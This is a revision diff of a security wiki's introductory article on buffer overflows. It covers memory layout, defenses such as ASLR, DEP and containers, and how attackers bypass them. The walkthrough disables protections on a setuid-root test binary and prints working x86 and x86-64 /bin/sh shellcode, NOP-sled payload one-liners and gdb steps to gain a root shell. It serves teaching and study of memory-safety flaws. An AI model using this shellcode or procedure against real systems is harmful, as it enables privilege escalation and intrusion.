
Difference between revisions of "Buffer overflow"

From NetSec
(Containers)
m (removed {{social}} because cancer)
 
(47 intermediate revisions by 8 users not shown)
Line 1: Line 1:
'''Buffer overflow''', or '''Buffer Overrun''' is a software error triggered when a program doesn't adequately control the amount of data that is copied over the [[buffer]], so if this amount exceeds the preassigned capacity, remaining bytes are stored in adjacent memory areas by overwriting its original content. This may lead to arbitrary code execution and allow access to a vulnerable system.  
+
'''Buffer overflow''', or '''Buffer Overrun''', is a [[application|software]] error triggered when a program does not adequately control the amount of data that is copied into a [[buffer]]. If this amount exceeds the preassigned capacity, the remaining [[byte]]s are stored in adjacent memory areas, overwriting their original content. This can be exploited by overwriting a function's [[return address]] to cause arbitrary code execution and allow access to a [[vulnerability|vulnerable]] system.
 
+
{{info|This is an introductory article to buffer overflows.  [[Bleeding Life]] is an example of a project containing buffer overflows that bypass [[ASLR]] and [[DEP]] for Windows 7.}}{{prereq|[[Assembly Basics|assembly]] and [[machine code]].}}
 +
<font size="-2">Special thanks to [[User:Teknical|Teknical]] for his contributions to this article.</font>
 
==Description==
 
==Description==
A computer receives [[input]], remembers what to do with the [[input]], and then does it. If an attacker on the internet could control the memory of a computer, the computer would remember the wrong thing to do, and do it because it doesn't know any better. This is what happens during a buffer overflow attack.
+
A computer receives [[input]], recalls what to do with the [[input]], and then does it. If an attacker on the internet could control the memory of a computer, the computer would remember the wrong thing to do, and execute it because it doesn't know any better. This is what happens during a buffer overflow attack.
 +
 
 +
The memory of a computer is much like a post office. Each piece of mail goes to a mailbox or a P.O. box, and each P.O. box can only hold one piece of mail at a time. Suppose for a moment that the post office that represents the computer's memory has 500 P.O. boxes. Boxes 1-200 are for data that the user sends into the computer, and boxes 201-500 hold instructions for what to do with that data.
 +
If a user sends in 300 pieces of data or mail, there are two scenarios:
 +
1. A secure program would tell the user "I can only hold 200 pieces, I'm not taking any more mail".
 +
2. An insecure program would simply take all the data into boxes 1-300.
 +
 
 +
In the insecure scenario, when the computer remembers what to do, it lands on P.O. box 201. If the user was an attacker, malicious instructions at P.O. box 201 would be executed! This is why the buffer overflow is such a dangerous [[vulnerability]]. {{notice|Though it is a dying attack vector, the buffer overflow is still very prominent today.}}
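The two scenarios can be sketched as a toy model. The Ruby below illustrates the analogy only, not real memory management; the names '''TOTAL_BOXES''', '''DATA_BOXES''', '''fresh_boxes''', '''secure_store''' and '''insecure_store''' are hypothetical and introduced here for the example.

```ruby
# Toy model of the post office analogy: 500 boxes, the first 200 for user
# data and the remaining 300 for instructions. All names are hypothetical.
TOTAL_BOXES = 500
DATA_BOXES  = 200

def fresh_boxes
  Array.new(DATA_BOXES, :empty) + Array.new(TOTAL_BOXES - DATA_BOXES, :instruction)
end

# Secure program: refuses mail that does not fit into the data boxes.
def secure_store(boxes, mail)
  raise ArgumentError, "only #{DATA_BOXES} pieces accepted" if mail.length > DATA_BOXES
  mail.each_with_index { |piece, i| boxes[i] = piece }
  boxes
end

# Insecure program: stores everything, spilling into the instruction boxes.
def insecure_store(boxes, mail)
  mail.each_with_index { |piece, i| boxes[i] = piece }
  boxes
end

mail = Array.new(300, :attacker_data)

overflowed = insecure_store(fresh_boxes, mail)
# Box 201 is index 200 because arrays count from zero.
puts "box 201 after insecure store: #{overflowed[200]}"

begin
  secure_store(fresh_boxes, mail)
rescue ArgumentError => e
  puts "secure store refused: #{e.message}"
end
```

The only difference between the two methods is the length check, which is the same check a vulnerable program leaves out.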
  
The memory of a computer is much like a post office. Each piece of mail goes to a mailbox or a P.O. box, and each P.O. box can only hold one piece of mail at a time. Suppose for a moment that the post office that represents the computer's memory has 500 P.O. boxes. Boxes 1-200 are for data that the user sends into the computer, and boxes 201-500 hold instructions for what to do with that data. Now what happens if a user sends in 300 pieces of data or mail? Well a secure program would tell the user "I can only hold 200 pieces, I'm not taking any more mail", but an insecure program would simply take all the data into boxes 1-300. So now, when the computer remembers what to do, it lands on P.O. box 201. If the user was an attacker, malicious instructions at P.O. box 201 would be executed! This is why the buffer overflow is such a dangerous [[vulnerability]]. {{notice|Though it is a dying attack vector, the buffer overflow is still very prominent today.}}
 
 
In all actuality, there is a [[return address]] that the computer uses to remember where its instructions are. So if an attacker filled up P.O. boxes 1-201, and 201 contained the return address, and the attacker changed the return address to P.O. box 1, the computer would execute the data instead of just keeping it in memory. This means that the attacker has to know enough about the system to know what address the malicious instructions are going to, because otherwise the attacker will not know the correct return address to put into P.O. Box 201. This means that the attacker has to have precise aim, or the attack will be unsuccessful.
 
In all actuality, there is a [[return address]] that the computer uses to remember where its instructions are. So if an attacker filled up P.O. boxes 1-201, and 201 contained the return address, and the attacker changed the return address to P.O. box 1, the computer would execute the data instead of just keeping it in memory. This means that the attacker has to know enough about the system to know what address the malicious instructions are going to, because otherwise the attacker will not know the correct return address to put into P.O. Box 201. This means that the attacker has to have precise aim, or the attack will be unsuccessful.
{{protip|Debuggers such as '''IDA Pro, kgdb, gdb''', and '''ollydbg''' are very helpful for finding the correct [[return address|return pointer]] for your [[shellcode]].}}
+
{{protip|Debuggers such as '''IDA Pro, kgdb, gdb''', and '''ollydbg''' are very helpful for finding the correct [[return address|return pointer]] for the [[shellcode]].}}
  
 
==Defenses==
 
==Defenses==
 
===[[ASLR]]===
 
===[[ASLR]]===
There are multiple defenses that have been incorporated into runtime in an attempt to fight buffer overflows and prevent them from taking place. One of the most recent defense mechanisms is called [[ASLR]], which stands for [[ASLR|Address Space Layout Randomization]]. It makes it so every time the computer reboots and every time a program runs, the address space that it lives in changes. In other words, following our mailbox analogy, the return address will never be in the same mailbox. The point of this is to try to prevent an attacker from performing a buffer overflow exploit because the attacker can never aim properly. Unfortunately, attackers have discovered something called "Magic Numbers", which tricks the error handler for programs and allows an attacker to aim his attack correctly without having to know a return address.
+
There are multiple defenses that have been incorporated into runtime in an attempt to fight buffer overflows and prevent them from taking place. One of the most recent defense mechanisms is called [[ASLR]], which stands for [[ASLR|Address Space Layout Randomization]]. It makes it so every time the computer reboots and every time a program runs, the address space that it lives in changes. In other words, following the mailbox analogy, the return address will never be in the same mailbox. The point of this is to try to prevent an attacker from performing a buffer overflow exploit because the attacker can never aim properly. Unfortunately, attackers have discovered something called "Magic Numbers", which tricks the error handler for programs and allows an attacker to aim his attack correctly without having to know a return address.  Some [[Bleeding Life|key failures]] of [[ASLR]] include that certain [[Operating System]]s (such as '''Windows 7''') dynamically disable it for non-compatible libraries.
  
 
===[[DEP]]===
 
===[[DEP]]===
Another defense mechanism that has been implemented is called [[DEP]], which stands for [[DEP|Data Execution Prevention]]. This is an attempt to prevent the return address from being changed into something in the same memory space as the data, and also prevent [[machine code]] (the code that buffer overflows are crafted in) from being placed into data segments. To combat this defense mechanism, attackers have developed ASCII and [[ascii shellcode|polymorphic ASCII]] [[machine code]]. ASCII and Polymorphic ASCII code looks like normal user [[input]] instead of [[machine code]].
+
Another defense mechanism that has been implemented is called [[DEP]], which stands for [[DEP|Data Execution Prevention]]. This is an attempt to prevent the return address from being changed into something in the same memory space as the data, and also prevent [[machine code]] (the code that buffer overflows are crafted in) from being placed into data segments. [[Return_Oriented_Programming_(ROP)]] is used when defeating modern [[DEP]].
 +
 
 +
To combat additional filters, attackers have developed [[alphanumeric shellcode|polymorphic and multi-architecture alphanumeric shellcode]] and [[ascii shellcode|polymorphic ASCII]] [[machine code]] and [[shellcode]]s. ASCII and Polymorphic ASCII code looks to many filters like normal user [[input]] instead of malicious [[binary]] or [[machine code]].
  
 
===Containers===
 
===Containers===
An even further defense mechanism is called a container, which is another layer of [[DEP|Data Execution Prevention]]. The container attempts to identify all possible results of code from data within the buffer (or the data segment) and then prevent the [[applications|application]] from calling external functions in shared objects from the inside of the buffer. A version of this has been implemented in Cisco Security Agent, or [[CSA]].  Linux's GrSec and PaX kernel patches also implement their own version of contained memory space.  {{notice|As attacks become more and more sophisticated, so do hardware and software prevention mechanisms.  Notice we're not keeping up?  Visit our [[IRC]] and tell us about it!}}
+
An even further defense mechanism is called a container, which is another layer of [[DEP|Data Execution Prevention]]. The container attempts to identify all possible results of code from data within the buffer (or the data segment) and then prevent the [[applications|application]] from calling external functions in shared objects from the inside of the buffer. A version of this has been implemented in Cisco Security Agent, or [[CSA]].  Linux's GrSec and PaX kernel patches also implement their own version of contained memory space.  {{notice|As attacks become more and more sophisticated, so do hardware and software prevention mechanisms.  Notice something outdated?  Visit our [[IRC]] and tell us about it!}}
  
===Bypassing Protections===
+
===Bypassing protections===
 
So with [[CSA]], [[ASLR]], and Operating-System supplied [[DEP]], successfully performing a buffer overflow exploit against a system can be extremely difficult. Any attacker who makes it to the point where [[CSA]] catches it is already very advanced. To successfully subvert [[ASLR]], [[DEP]] and containers one must use [[polymorphic]] [[ascii shellcode|ASCII shellcode]] and return-oriented programming.  Return-oriented programming is used to evade the NX bit and XD bits, a type of hardware DEP implemented directly into processors.  [[machine code|Machine code]] that self-modifies as well as looks like standard user [[input]] and has all of its own functions built into its own code, in a return-oriented fashion, is required to bypass modern-day host level buffer overflow defense standards.  The return address must always be specified in normal hexadecimal format, so it will usually look like some really funny characters, like squares or like strange symbols. The [[IDS]] or [[HIDS]] Context Buffer will show four squares or symbols on the end in a real buffer overflow exploit attempt on 32-bit systems, and eight squares or symbols on the end on a 64-bit system.   
 
So with [[CSA]], [[ASLR]], and Operating-System supplied [[DEP]], successfully performing a buffer overflow exploit against a system can be extremely difficult. Any attacker who makes it to the point where [[CSA]] catches it is already very advanced. To successfully subvert [[ASLR]], [[DEP]] and containers one must use [[polymorphic]] [[ascii shellcode|ASCII shellcode]] and return-oriented programming.  Return-oriented programming is used to evade the NX bit and XD bits, a type of hardware DEP implemented directly into processors.  [[machine code|Machine code]] that self-modifies as well as looks like standard user [[input]] and has all of its own functions built into its own code, in a return-oriented fashion, is required to bypass modern-day host level buffer overflow defense standards.  The return address must always be specified in normal hexadecimal format, so it will usually look like some really funny characters, like squares or like strange symbols. The [[IDS]] or [[HIDS]] Context Buffer will show four squares or symbols on the end in a real buffer overflow exploit attempt on 32-bit systems, and eight squares or symbols on the end on a 64-bit system.   
 
{{Info|Learning to [[Assembly_Basics#Counting|count]] in hex and [[Bitwise Math|bitwise math]] will tell you more about the sizes.}}
 
{{Info|Learning to [[Assembly_Basics#Counting|count]] in hex and [[Bitwise Math|bitwise math]] will tell you more about the sizes.}}
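The four and eight symbol figures follow from the pointer width. A minimal Ruby sketch, assuming two example addresses: 0xbffff610 is the stack address used in the example section of this article, and the 64-bit value is made up purely for illustration.

```ruby
# Pack example addresses as raw little-endian bytes, the form in which a
# return address appears inside an overflow payload.
addr32 = 0xbffff610          # 32-bit stack address from the example section
addr64 = 0x00007fffffffe410  # made-up 64-bit stack address (assumption)

raw32 = [addr32].pack("V")   # "V"  = 32-bit unsigned, little-endian
raw64 = [addr64].pack("Q<")  # "Q<" = 64-bit unsigned, little-endian

# Count bytes outside the printable ASCII range 0x20..0x7e; these are the
# ones a log viewer tends to render as squares or odd symbols.
def unprintable(raw)
  raw.bytes.count { |b| b < 0x20 || b > 0x7e }
end

puts "32-bit: #{raw32.bytesize} bytes, #{unprintable(raw32)} unprintable"
puts "64-bit: #{raw64.bytesize} bytes, #{unprintable(raw64)} unprintable"
```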
  
==Maximum Effectiveness==
+
==Maximum effectiveness==
Sometimes attackers and pen-testers alike use what is called [[Second Stage Shellcode]]. Many times [[firewall]] rules will prevent any connections outgoing from a server machine and prevent all incoming connections except for connections on the specified server port. Because of this, attackers use what is called [[Second Stage Shellcode]] to first find the connection that the exploit originated from, and then send the output of the arbitrary functions back along the first connection. This is done to circumvent [[Firewall|firewalls]] and prevent a [[firewall]] from blocking a connection.
+
Many times [[firewall]] rules will prevent any connections outgoing from a server machine and prevent all incoming connections except for connections on the specified server port. Because of this, attackers use what is called '''Second Stage Shellcode''' to first find the connection that the exploit originated from, and then send the output of the arbitrary functions back along the first connection. This is done to circumvent [[Firewall|firewalls]] and prevent a [[firewall]] from blocking a connection.
  
Buffer overflows can be used remotely to gain partial or total systems access, or they can be used locally to escalate privileges and permissions segments inside of the operating system in order to gain system or root level access. The real threat that a buffer overflow causes is what is called the "[[Zero-Day attack]]", also known as a buffer overflow that the [[security]] world has never seen before. [[Zero-Day attack|Zero-Day]] or [[Zero-Day attack|0day]] attacks are the most devastating to the [[security industry]], causing [[worms]], [[viruses]], and sometimes even hundreds of thousands of systems to be compromised in a single day.
+
Buffer overflows can be used remotely to gain partial or total systems access, or they can be used locally to escalate privileges and permissions segments inside of the operating system in order to gain system or root level access. The real threat that a buffer overflow causes is what is called the "[[Zero-Day attack]]", also known as a buffer overflow that the [[security]] world has never seen before. [[Zero-Day attack|Zero-Day]] or [[Zero-Day attack|0day]] attacks are the most devastating to the '''security industry''', causing worms, [[viruses]], and sometimes even hundreds of thousands of systems to be compromised in a single day.
  
 
==Causes==
 
==Causes==
Buffer overflows exist because a combination of insecure language [[Compiler|compilers]], insecure [[Programmer|programmers]] and bad cpu architectures that keep [[return address]] from a function call in the stack. A [[programmer]] should be able to check [[input]] to the data segment with relative ease, however often times coders are either ignorant of the problem, overlook the flaw, or sometimes even a disgruntled employee might code the [[vulnerability]] into an application himself for his own personal gain after the application goes [[production]] level.
+
Buffer overflows exist because a combination of insecure language [[Compiler|compilers]], insecure [[Programmer|programmers]] and bad cpu architectures that keep [[return address]] from a function call in the stack. A [[programmer]] should be able to check [[input]] to the data segment with relative ease, however often times coders are either ignorant of the problem, overlook the flaw, or sometimes even a disgruntled employee might code the [[vulnerability]] into an [[applications|application]] himself for his own personal gain after the application goes to [[production]]. {{protip|Bench-marking and pen-testing software in an as-you-develop fashion for proper quality assurance and control can help '''prevent attacks''' from a '''malicious insider'''.}}
  
 
==Example==
 
==Example==
 
+
{{notice|This example is for a '''32 bit [[Linux]] operating system''' and the steps below may vary per your distribution and installation.}}
 
+
===Disabling [[ASLR]]===
Let's first disable [[ASLR]].  This makes it easier for our proof of concept to be successful.  There are other methods of bypassing ASLR, but we will not cover them here.
+
The first step is to disable [[ASLR]].  This allows the featured proof of concept to be successful.  There are other methods of bypassing ASLR, but will not be covered here.
  
 
   teknical@teknical-vm:~$ sudo -s
 
   teknical@teknical-vm:~$ sudo -s
Line 42: Line 51:
 
   teknical@teknical-vm:~$  
 
   teknical@teknical-vm:~$  
  
 +
===Test application===
 +
The test application is below.  Note that there is a statically allocated buffer of 100 bytes.  This is what will be overflowed.  The use of strcpy on an unchecked buffer is very common.  Avoiding it is recommended to prevent applications from being exploited.
  
Our test application is below.  Notice we have a statically allocated buffer of 100 bytes.  This is what we will be overflowing.  The use of strcpy on an unchecked buffer is actually very common.  It is something you should attempt to stay away from to prevent your own applications from being exploited.
+
====bof.c====
 
+
{{code|text=<source lang="c">
  teknical@teknical-vm:~$ cat bof.c
+
 
   #include <stdlib.h>
 
   #include <stdlib.h>
 
   #include <stdio.h>
 
   #include <stdio.h>
Line 54: Line 64:
 
   strcpy(buffer,  argv[1]);
 
   strcpy(buffer,  argv[1]);
 
   return 0;
 
   return 0;
   }
+
   }</source>}}
  
Lets compile our test application.  We will use the -g option of gcc to tell the linker to include debugging symbols, this makes it easier for us to debug during our attempts to achieve code execution.
+
====Compiling====
 +
 
 +
For compilation, use the -g option of gcc to include debugging symbols in the binary, which makes debugging easier during the attempts to achieve code execution.
  
 
   teknical@teknical-vm:~$ gcc -g bof.c -o bof
 
   teknical@teknical-vm:~$ gcc -g bof.c -o bof
  
Now that our test application is compiled, we can attempt to trigger the vulnerability. We know that our buffer can only hold 100 bytes, so lets test by passing it 104 bytes, which should cause an overflow. We use ruby to dynamically build a 104 byte string.  You can also use perl if you prefer.
+
Following compilation, the vulnerability can be triggered. The buffer in this example holds 100 bytes, so passing 104 bytes is a good first test and should cause an overflow. Ruby is used to dynamically build the 104 byte string; perl is another option.
 
+
  
 +
=====Potential compile-time protections=====
 
   teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*104'`
 
   teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*104'`
 
   *** stack smashing detected ***: ./bof terminated
 
   *** stack smashing detected ***: ./bof terminated
 +
{{quote|By default on newer versions of gcc and other modern compilers, code is sanitized and protected at compile time.|Teknical}}
  
 +
=====Solution for test application=====
 +
The test application must be compiled without this protection. The stack protection is removed by passing the -fno-stack-protector option to gcc.
  
Wait...What is this.  By default on newer versions of gcc and other modern compilers, they include code that serves to protect the stack. We will not go into detail about that in this lession.
+
  teknical@teknical-vm:~$ gcc -g -fno-stack-protector bof.c -o bof
  
We need to compile our test application without the stack protection.  This can be done by adding the -fno-stack-protector option to gcc.
+
===Testing===
 +
A setuid binary is used for this example to ensure that a root shell is obtained.  Set up the bof binary for setuid as shown below:
  
   teknical@teknical-vm:~$ gcc -g -fno-stack-protector bof.c -o bof
+
   teknical@teknical-vm:~$ sudo chown root:root ./bof
 +
  teknical@teknical-vm:~$ sudo chmod 4755 ./bof
  
Now that we have recompiled our application with no stack protection, we can again attempt to trigger the vulnerability. We will start at 104 bytes and move up until we trigger the vulnerability.
+
====On x86====
 +
Now that the application has been recompiled without stack protection, the vulnerability can be triggered again. Start at 104 bytes and increase the length until the vulnerability is triggered.
  
 
   teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*104'`
 
   teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*104'`
Line 80: Line 98:
 
   Segmentation fault
 
   Segmentation fault
  
Notice that it took 112 bytes to successfully overwrite the saved ebp of the running application.  We are now ready to attempt exploitation.  Note, that we will need 116 bytes to overwrite the return address on the stack.
+
Note that it took 112 bytes to successfully overwrite the saved ebp of the running application.  Exploitation can now be attempted.  Note that 116 bytes are required to overwrite the return address on the stack.
 +
{{notice|These extra [[byte|bytes]] hold saved copies of other [[Assembly_Basics#Instructions_.26_Concepts|registers]] (sometimes [[Assembly_Basics#Special_Registers|special registers]]) or alignment padding.  They are overwritten as well.}}
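The byte counts above can be turned into a rough map of the stack frame. The following Ruby sketch only restates the observed numbers (a 100 byte buffer, 112 bytes to cover the saved ebp, 116 to cover the return address). The 8 byte gap it derives is an inference from those numbers, and its exact contents depend on the compiler. The constant names are hypothetical.

```ruby
BUFFER_SIZE = 100  # char buffer of 100 bytes in bof.c
WORD        = 4    # size of a saved register or pointer on x86
EBP_COVERED = 112  # bytes needed to overwrite the saved ebp (observed)
RET_COVERED = 116  # bytes needed to overwrite the return address (observed)

saved_ebp_offset = EBP_COVERED - WORD  # first byte of the saved ebp
ret_offset       = RET_COVERED - WORD  # first byte of the return address
gap              = saved_ebp_offset - BUFFER_SIZE

puts "buffer:         offsets 0..#{BUFFER_SIZE - 1}"
puts "gap:            offsets #{BUFFER_SIZE}..#{saved_ebp_offset - 1} (#{gap} bytes)"
puts "saved ebp:      offsets #{saved_ebp_offset}..#{EBP_COVERED - 1}"
puts "return address: offsets #{ret_offset}..#{RET_COVERED - 1}"
```

On a different compiler or distribution the observed counts will differ, so the two observed constants are the values to change first.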
  
For this example, we will be using a setuid binary, to ensure we gain a root shell.  Set up our bof binary for setuid below.
+
====On x86-64====
  
   teknical@teknical-vm:~$ sudo chown root:root ./bof
+
This number will vary on x86-64...
   teknical@teknical-vm:~$ sudo chmod 4755 ./bof
+
 
 +
   xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 100'`
 +
  xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 110'`
 +
   xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 120'`
 +
  Segmentation fault
 +
  xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 119'`
 +
 
 +
On x86-64 it takes 120 bytes to trigger a segfault. Another important difference is that the return address will be placed in the 8 byte rip register, not the 4 byte eip register.
 +
 
 +
===Disabling DEP===
 +
[[DEP]] is another protection scheme which prevents code in the stack from being executed. 'execstack' is used to check the status of and set the binary to have an executable stack.
  
[[DEP]] is another protection scheme which prevents code in the stack from being executed.  We can use 'execstack' to check the status of and set our binary to have an executable stack.
+
{{quote|Gcc's `-z execstack' parameter can be used to set the stack as executable at compile time|Xochipilli}}
  
 
The -q option will query the current status.
 
The -q option will query the current status.
Line 94: Line 123:
 
   - bof
 
   - bof
  
Notice the -, which means that our application will NOT have an executable stack.  This will prevent successful exploitation.
+
Notice the -, which means that the application will NOT have an executable stack.  This will prevent successful exploitation.
  
We can use the -s option to set our binary to allow execution on the stack.
+
The -s option is used to set the binary to allow execution on the stack.
  
 
   teknical@teknical-vm:~$ sudo execstack -s bof
 
   teknical@teknical-vm:~$ sudo execstack -s bof
  
If we query again, we will notice an X in its place, which means that our stack is now executable.
+
If queried again, an X will appear in its place, which means that the stack is now executable.
  
 
   teknical@teknical-vm:~$ sudo execstack -q bof
 
   teknical@teknical-vm:~$ sudo execstack -q bof
 
   X bof
 
   X bof
  
 +
===Debugging===
 +
{{notice|'''gdb''' is required for the following sections, installed using the package manager}}
 +
The next step is to start up gdb and begin debugging.
  
Ok, back to the goods.  Lets start up gdb and begin debugging.
+
====Shellcode analysis====
 +
{{info|[[Shellcode]] is [[machine code]] in flat binary form that is executed during the exploitation of a buffer overflow.}}
  
We will use `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x41\x41\x41\x41"'` as the argument to our test application.
+
=====On x86=====
  
Lets examine this.
+
The following will be used as the argument to the test application:
  
   `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x41\x41\x41\x41"'`
+
   '''`ruby -e 'print "\x90"*60,'''
 +
  '''"\xeb\x1f\x5e\x89\x76\x08'''
 +
  '''\x31\xc0\x88\x46\x07\x89'''
 +
  '''\x46\x0c\xb0\x0b\x89\xf3'''
 +
  '''\x8d\x4e\x08\x8d\x56\x0c'''
 +
  '''\xcd\x80\x31\xdb\x89\xd8'''
 +
  '''\x40\xcd\x80\xe8\xdc\xff'''
 +
  '''\xff\xff/bin/sh", "A"*7,'''
 +
  '''"\x41\x41\x41\x41"'` '''
  
The shell code we will be using is 45 bytes long.  It is a setuid + drop shell.
+
A few things should be noted when examining the argument above.{{notice|The backticks are [[bash]] command substitution as described in the [[bash book]].}}The shellcode used is 45 bytes long.  It executes /bin/sh and then exits; the root shell is obtained because the target binary is setuid:
  
   \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh
+
   \xeb\x1f\x5e\x89\x76\x08
 +
  \x31\xc0\x88\x46\x07\x89
 +
  \x46\x0c\xb0\x0b\x89\xf3
 +
  \x8d\x4e\x08\x8d\x56\x0c
 +
  \xcd\x80\x31\xdb\x89\xd8
 +
  \x40\xcd\x80\xe8\xdc\xff
 +
  \xff\xff/bin/sh
  
We know that we need at least 112 bytes to overwrite ebp, and another 4 to overwrite the return address.  We will pad our shellcode with 60 NOPs.  60 + 45 = 105.  We know that we still need 7 bytes to overwrite ebp and another 4 to overwrite the return address.  I prefer to use 0x41/'A' for this portion, because it easier to debug with. We add another 7 bytes of 'A', and then 4 on the end for our return address.  60 + 45 + 7 + 4 = 116, which is the number of bytes we need to overwrite the return address, and successfully exploit our target.
+
As established earlier, at least 112 bytes are required to overwrite ebp, and another 4 to overwrite the return address.  The shellcode is padded with 60 NOPs in front: 60 + 45 = 105.  That leaves 7 more bytes to finish overwriting ebp and another 4 to overwrite the return address.  0x41/'A' is recommended for this portion because it is easier to debug with. Another 7 bytes of 'A' are added, and then 4 on the end for the return address.  60 + 45 + 7 + 4 = 116, which is the number of bytes needed to overwrite the return address and successfully exploit the target.
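The arithmetic can be checked by assembling the same pieces in a script instead of a one-liner. This is a minimal sketch that reuses the shellcode bytes listed above; the variable names are hypothetical, and the four 'A' bytes at the end are only a placeholder for the return address.

```ruby
# Rebuild the 32-bit test argument piece by piece and check the lengths.
# ".b" marks each string as raw bytes so Ruby does not treat it as UTF-8.
nops = "\x90".b * 60

shellcode = ("\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89" \
             "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" \
             "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff" \
             "\xff\xff/bin/sh").b

padding  = "A".b * 7               # brings the total to 112, covering the saved ebp
ret_addr = "\x41\x41\x41\x41".b    # placeholder until the real address is known

payload = nops + shellcode + padding + ret_addr

puts "shellcode: #{shellcode.bytesize} bytes"
puts "payload:   #{payload.bytesize} bytes"
```

Keeping each part in its own variable makes it easy to change the NOP count or the padding later while confirming that the total stays at 116 bytes.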
  
 +
=====On x86-64=====
  
Start gdb.
+
The following shellcode is used to spawn a shell:
 +
 
 +
  "\x48\x31\xd2"                                  // xor    %rdx, %rdx
 +
  "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68"      // mov    $0x68732f6e69622f2f, %rbx
 +
  "\x48\xc1\xeb\x08"                              // shr    $0x8, %rbx
 +
  "\x53"                                          // push  %rbx
 +
  "\x48\x89\xe7"                                  // mov    %rsp, %rdi
 +
  "\x50"                                          // push  %rax
 +
  "\x57"                                          // push  %rdi
 +
  "\x48\x89\xe6"                                  // mov    %rsp, %rsi
 +
  "\xb0\x3b"                                      // mov    $0x3b, %al
 +
  "\x0f\x05";                                    // syscall
 +
 
 +
Or:
 +
 
 +
  \x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05
 +
 
 +
This shellcode is 30 bytes long. 120 bytes are required to reach the return address, plus 8 bytes for the return address itself. To start, use a 60 byte nopsled + 30 byte shellcode + 30 bytes of padding + 8 byte return address, totaling 128 bytes.
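The x86-64 layout can be tabulated the same way. The sketch below reuses the shellcode bytes listed above and prints the offset at which each part begins; the part names are hypothetical and the eight 'B' bytes merely stand in for a return address that has not been determined yet.

```ruby
# ".b" marks each string as raw bytes so Ruby does not treat it as UTF-8.
shellcode = ("\x48\x31\xd2" \
             "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" \
             "\x48\xc1\xeb\x08" \
             "\x53" \
             "\x48\x89\xe7" \
             "\x50" \
             "\x57" \
             "\x48\x89\xe6" \
             "\xb0\x3b" \
             "\x0f\x05").b

parts = [
  ["nop sled",       "\x90".b * 60],
  ["shellcode",      shellcode],
  ["padding",        "A".b * 30],
  ["return address", "B".b * 8]   # placeholder value
]

# Walk the parts in order and report where each one starts.
offset = 0
parts.each do |name, bytes|
  puts format("%-15s offset %3d, %3d bytes", name, offset, bytes.bytesize)
  offset += bytes.bytesize
end

payload = parts.map { |_, bytes| bytes }.join
puts "total: #{payload.bytesize} bytes"
```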
 +
 
 +
====Finding the [[return address]]====
 +
* '''Starting gdb'''
  
 
   teknical@teknical-vm:~$ gdb -q ./bof
 
   teknical@teknical-vm:~$ gdb -q ./bof
 
   Reading symbols from /home/teknical/bof...done.
 
   Reading symbols from /home/teknical/bof...done.
  
Set a breakpoint inside of our "main" function.
+
* '''Setting a breakpoint inside of the "main" function'''
  
 
   (gdb) break main
 
   (gdb) break main
 
   Breakpoint 1 at 0x80483ed: file bof.c, line 7.
 
   Breakpoint 1 at 0x80483ed: file bof.c, line 7.
  
Start our application with the command line we discussed above.
+
* '''Starting the application with the command line as discussed above.'''
 +
 
 +
=====On x86=====
  
   (gdb) r `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x41\x41\x41\x41"'`
+
   (gdb) r `ruby -e 'print "\x90"*60, "[insert our shellcode here]", "A"*7, "\x41\x41\x41\x41"'`
   Starting program: /home/teknical/bof `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x41\x41\x41\x41"'`
+
   Starting program: /home/teknical/bof `ruby -e 'print "\x90"*60,  
 +
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56
 +
  \x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x41\x41\x41\x41"'`
  
 
   Breakpoint 1, main (argc=2, argv=0xbffff474) at bof.c:7
 
   Breakpoint 1, main (argc=2, argv=0xbffff474) at bof.c:7
 
   7 strcpy(buffer,  argv[1]);
 
   7 strcpy(buffer,  argv[1]);
 
+
{{quote|Inside the main function, examine the stack.  It is known that at least 116 bytes on the stack are required, so 200 words are examined to make sure all the required space is present.  The thing to look for is the address of the shell code on the stack.|Teknical}}
